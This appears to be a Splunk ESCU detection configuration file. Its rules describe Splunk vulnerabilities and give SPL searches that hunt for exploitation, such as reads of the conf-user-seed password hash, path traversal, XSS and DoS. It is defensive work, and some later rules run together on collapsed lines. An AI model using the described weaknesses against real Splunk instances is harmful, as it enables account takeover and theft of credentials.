action.escu.how_to_implement = Requires access to internal indexes. This detection search will display irregular path file execution, which will display exploit attempts. Only applies to Microsoft Windows Splunk versions.
action.escu.known_false_positives = Irregular path with files that may be purposely called for benign reasons may produce false positives.
action.escu.creation_date = 2024-01-18
action.escu.modification_date = 2024-01-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Enterprise Windows Deserialization File Partition - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Possible Windows Deserialization exploitation via irregular path file against $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Enterprise Windows Deserialization File Partition - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2024-23678"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows.
action.notable.param.rule_title = Splunk Enterprise Windows Deserialization File Partition
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunk_python` request_path="/en-US/app/search/C:\\Program" *strings* | rex "request_path=(?<file_path>[^\"]+)" | rex field=file_path "[^\"]+/(?<file_name>[^\"\'\s/\\\\]+)" | stats min(_time) as firstTime max(_time) as lastTime values(file_path) as file_path values(file_name) as file_name by index, sourcetype, host | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_windows_deserialization_file_partition_filter`

[ESCU - Splunk ES DoS Investigations Manager via Investigation Creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted.
action.escu.how_to_implement = This search requires access to internal indexes. Only affects Splunk Enterprise Security versions lower than 7.1.2.
action.escu.known_false_positives = The vulnerability requires an authenticated session and access to create an Investigation. It only affects the availability of the Investigations manager, but without the manager, the Investigations functionality becomes unusable for most users. This search gives the exact offending event.
action.escu.creation_date = 2024-01-04
action.escu.modification_date = 2024-01-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk ES DoS Investigations Manager via Investigation Creation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise Security"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Denial of Service Attack against Splunk ES Investigation Manager by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk ES DoS Investigations Manager via Investigation Creation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-22165"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted.
action.notable.param.rule_title = Splunk ES DoS Investigations Manager via Investigation Creation
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_investigation_rest_handler` method=put msg=*investigation* status=error | stats count min(_time) as firstTime max(_time) as lastTime by user method msg | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_es_dos_investigations_manager_via_investigation_creation_filter`

[ESCU - Splunk ES DoS Through Investigation Attachments - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible.
action.escu.how_to_implement = This search requires access to internal indexes. It only affects Enterprise Security versions below 7.1.2.
action.escu.known_false_positives = This search will show the exact DoS event via the error message and investigation id. The error, however, does not point exactly at the uploader, as any user associated with the investigation will be affected. The operator must use the investigation id to investigate the possible origin of the malicious upload. The attack only affects the specific investigation, not the investigation manager.
action.escu.creation_date = 2024-01-04
action.escu.modification_date = 2024-01-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk ES DoS Through Investigation Attachments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise Security"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Denial of Service detected at Splunk ES affecting $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk ES DoS Through Investigation Attachments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-22164"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible.
action.notable.param.rule_title = Splunk ES DoS Through Investigation Attachments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_investigation_rest_handler` status=error object=investigation | stats min(_time) as firstTime max(_time) as lastTime values(status) as status values(msg) as msg values(id) as investigation_id by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_es_dos_through_investigation_attachments_filter`

[ESCU - Splunk HTTP Response Splitting Via Rest SPL Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = A low-privileged user, using a specially crafted search command, can trigger an HTTP response splitting vulnerability with the rest SPL command that lets them potentially access other REST endpoints in the system arbitrarily, including accessing restricted content such as password files. This is because the user is able to inject the rest SPL command into the q parameter of an HTTP GET web request. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The attacker cannot exploit the vulnerability at will.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.006"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = A low-privileged user, using a specially crafted search command, can trigger an HTTP response splitting vulnerability with the rest SPL command that lets them potentially access other REST endpoints in the system arbitrarily, including accessing restricted content such as password files. This is because the user is able to inject the rest SPL command into the q parameter of an HTTP GET web request. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The attacker cannot exploit the vulnerability at will.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This search may assist in detecting possible HTTP response splitting exploitation attempts.
action.escu.known_false_positives = This search may produce false positives, as malformed or erroneous requests made to this endpoint may be executed willingly or erroneously by operators.
action.escu.creation_date = 2023-05-23
action.escu.modification_date = 2023-05-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk HTTP Response Splitting Via Rest SPL Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk HTTP Response Splitting Via Rest SPL Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.006"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `audit_searches` AND search IN ("*|*rest*POST*","*|*rest*PUT*","*|*rest*PATCH*","*|*rest*DELETE*") AND NOT search="*audit_searches*" | table user info has_error_msg search _time | `splunk_http_response_splitting_via_rest_spl_command_filter`

[ESCU - Splunk Improperly Formatted Parameter Crashes splunkd - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting search provides the user, timing and number of times the crashing command was executed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
action.escu.data_models = ["Splunk_Audit"]
action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting search provides the user, timing and number of times the crashing command was executed.
action.escu.how_to_implement = Requires access to audittrail and use of the Splunk_Audit.Search_Activity datamodel.
action.escu.known_false_positives = This is a hunting search; it should be focused on affected products, otherwise it is likely to produce false positives.
action.escu.creation_date = 2023-02-14
action.escu.modification_date = 2023-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Improperly Formatted Parameter Crashes splunkd - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = An attempt to exploit ingest eval parameter was detected from $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Splunk Improperly Formatted Parameter Crashes splunkd - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2023-22941"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting search provides the user, timing and number of times the crashing command was executed.
action.notable.param.rule_title = Splunk Improperly Formatted Parameter Crashes splunkd
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where (Search_Activity.search="*makeresults*" AND Search_Activity.search="*ingestpreview*transforms*") Search_Activity.search_type=adhoc Search_Activity.search!="*splunk_improperly_formatted_parameter_crashes_splunkd_filter*" Search_Activity.user!=splunk-system-user by Search_Activity.search, Search_Activity.info, Search_Activity.total_run_time, Search_Activity.user, Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_improperly_formatted_parameter_crashes_splunkd_filter`

[ESCU - Splunk Information Disclosure in Splunk Add-on Builder - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Add-on Builder versions below 4.1.4, the application writes sensitive information to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Add-on Builder versions below 4.1.4, the application writes sensitive information to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.
action.escu.how_to_implement = This search should be run on search heads where Splunk Add-on Builder may be installed. The results of this search will conclusively show whether or not a vulnerable version of Splunk Add-on Builder is currently installed.
action.escu.known_false_positives = This search is highly specific for vulnerable versions of Splunk Add-on Builder. There are no known false positives.
action.escu.creation_date = 2024-01-30
action.escu.modification_date = 2024-01-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Information Disclosure in Splunk Add-on Builder - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Information Disclosure in Splunk Add-on Builder - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | rest /services/apps/local | search disabled=0 core=0 label="Splunk Add-on Builder" | dedup label | search version < 4.1.4 | eval WarningMessage="Splunk Add-on Builder Versions older than v4.1.4 contain a critical vulnerability. Update to Splunk Add-on Builder v4.1.4 or higher immediately. For more information about this vulnerability, please refer to https://advisory.splunk.com/advisories/SVD-2024-0111" | table label version WarningMessage | `splunk_information_disclosure_in_splunk_add_on_builder_filter`

[ESCU - Splunk list all nonstandard admin accounts - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will enumerate all Splunk Accounts with administrative rights on this instance. It deliberately ignores the default admin account since this is assumed to be present. This search may help in detecting the Cross-Site Scripting attack listed: In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search will enumerate all Splunk Accounts with administrative rights on this instance. It deliberately ignores the default admin account since this is assumed to be present. This search may help in detecting the Cross-Site Scripting attack listed: In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled.
action.escu.how_to_implement = The user running this search is required to have a permission allowing them to dispatch REST requests to indexers (the `dispatch_rest_to_indexers` capability) in some architectures. If admin accounts, in addition to the standard admin account, have been intentionally created on this server, then edit the filter macro to exclude them.
action.escu.known_false_positives = It is not possible to discern from the user table whether or not users with admin rights have been created intentionally, accidentally, or as a result of exploitation. Each user with these rights should be investigated and, if legitimate, added to the filter macro above. If a user is not believed to be legitimate, then further investigation should take place.
action.escu.creation_date = 2023-02-07
action.escu.modification_date = 2023-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk list all nonstandard admin accounts - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Splunk list all nonstandard admin accounts - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22933"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | rest splunk_server=local /services/authentication/users | search capabilities=admin* OR imported_capabilities=admin* title!=admin | table title roles capabilities splunk_server | `splunk_list_all_nonstandard_admin_accounts_filter`

[ESCU - Splunk Low Privilege User Can View Hashed Splunk Password - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user who holds the user role can see the hashed version of the initial user name and password for the Splunk instance by using the rest SPL command against the conf-user-seed REST endpoint. This can lead to a privilege escalation that lets the user take over the admin account on the instance.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user who holds the user role can see the hashed version of the initial user name and password for the Splunk instance by using the rest SPL command against the conf-user-seed REST endpoint. This can lead to a privilege escalation that lets the user take over the admin account on the instance.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to discover attempts to access conf-user-seed file content.
action.escu.known_false_positives = This search may produce false positives, as accounts with high privileges may access this file. Operators will need to investigate these actions in order to discern exploitation attempts.
action.escu.creation_date = 2023-05-09
action.escu.modification_date = 2023-05-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Low Privilege User Can View Hashed Splunk Password - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Low Privilege User Can View Hashed Splunk Password - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_web` uri="*/servicesNS/nobody/system/configs/conf-user-seed*" | stats earliest(_time) as event_time values(method) as method values(status) as status values(clientip) as clientip values(useragent) as useragent values(file) as file by user | convert ctime(*time) | `splunk_low_privilege_user_can_view_hashed_splunk_password_filter`

[ESCU - Splunk Path Traversal In Splunk App For Lookup File Edit - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user with access to the Splunk App for Lookup File Editing can, with a specially crafted web request, trigger a path traversal exploit that can then be used to read and write to restricted areas of the Splunk installation directory, including but not limited to the password hash file for the instance.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user with access to the Splunk App for Lookup File Editing can, with a specially crafted web request, trigger a path traversal exploit that can then be used to read and write to restricted areas of the Splunk installation directory, including but not limited to the password hash file for the instance.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This detection is meant for on-premises environments and, if executed on internet-facing servers without a WAF, may produce a lot of results. This detection will not work against obfuscated path traversal requests.
action.escu.known_false_positives = This search may find additional path traversal exploitation attempts or malformed requests.
action.escu.creation_date = 2023-05-11
action.escu.modification_date = 2023-05-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Path Traversal In Splunk App For Lookup File Edit - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Path Traversal In Splunk App For Lookup File Edit - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkda` uri_query=*lookup_file* | table clientip uri_query lookup_file owner namespace version | stats count by clientip namespace lookup_file uri_query | `splunk_path_traversal_in_splunk_app_for_lookup_file_edit_filter`

[ESCU - Persistent XSS in RapidDiag through User Interface Views - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. This search provides information on which user may have added a malicious payload and which users were exposed to it.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. This search provides information on which user may have added a malicious payload and which users were exposed to it.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index.
action.escu.known_false_positives = This is a hunting search; it will not deobfuscate the base64 payload, but it will show which user added the view artifact and which user opened it. It will require further investigation based on the information presented by this hunting search.
action.escu.creation_date = 2023-02-14
action.escu.modification_date = 2023-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Persistent XSS in RapidDiag through User Interface Views - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = A potential XSS attempt has been detected from $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Persistent XSS in RapidDiag through User Interface Views - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22932"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. This search provides information on which user may have added a malicious payload and which users were exposed to it.
action.notable.param.rule_title = Persistent XSS in RapidDiag through User Interface Views
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `audit_searches` path=/opt/splunk/etc/users/*/search/local/data/ui/views/* action=* | table user action roles info roles path | dedup user action | `persistent_xss_in_rapiddiag_through_user_interface_views_filter`

[ESCU - Splunk Persistent XSS Via URL Validation Bypass W Dashboard - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 9.0.4, 8.2.10, and 8.1.13, a low-privileged user can bypass URL validation to perform a path traversal and access restricted and confidential information by targeting other users on the instance, including the admin user. The only affected version of bootstrap which shipped with Splunk was version 2.3.1, so the search is targeted at that version alone.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 9.0.4, 8.2.10, and 8.1.13, a low-privileged user can bypass URL validation to perform a path traversal and access restricted and confidential information by targeting other users on the instance, including the admin user. The only affected version of bootstrap which shipped with Splunk was version 2.3.1, so the search is targeted at that version alone.
action.escu.how_to_implement = This search does not require additional data to be ingested. This search requires the ability to search the _internal index. This search helps discover access to vulnerable bootstrap versions.
action.escu.known_false_positives = This search will produce numerous false positives as it shows ANY accesses to vulnerable bootstrap Javascript files. Accesses to these files occur during normal Splunk usage. To reduce or eliminate false positives, update the a version of Splunk which has addressed the vulnerability. action.escu.creation_date = 2023-05-09 action.escu.modification_date = 2023-05-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Persistent XSS Via URL Validation Bypass W Dashboard - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Persistent XSS Via URL Validation Bypass W Dashboard - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 20, "cve": ["CVE-2019-8331"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_web` method=GET uri_path="*bootstrap-2.3.1*" file="*.js" | table _time clientip uri_path file status | `splunk_persistent_xss_via_url_validation_bypass_w_dashboard_filter` [ESCU - Splunk Process Injection Forwarder Bundle Downloads - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. 
This hunting search pulls a full list of forwarder bundle downloads where the peer column is the forwarder, the host column is the Deployment Server, and then you have a list of the apps downloaded and the serverclasses in which the peer is a member of. You should look for apps or clients that you do not recognize as being part of your environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. This hunting search pulls a full list of forwarder bundle downloads where the peer column is the forwarder, the host column is the Deployment Server, and then you have a list of the apps downloaded and the serverclasses in which the peer is a member of. You should look for apps or clients that you do not recognize as being part of your environment. action.escu.how_to_implement = This hunting search uses native logs produced when a deployment server is within your environment. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d 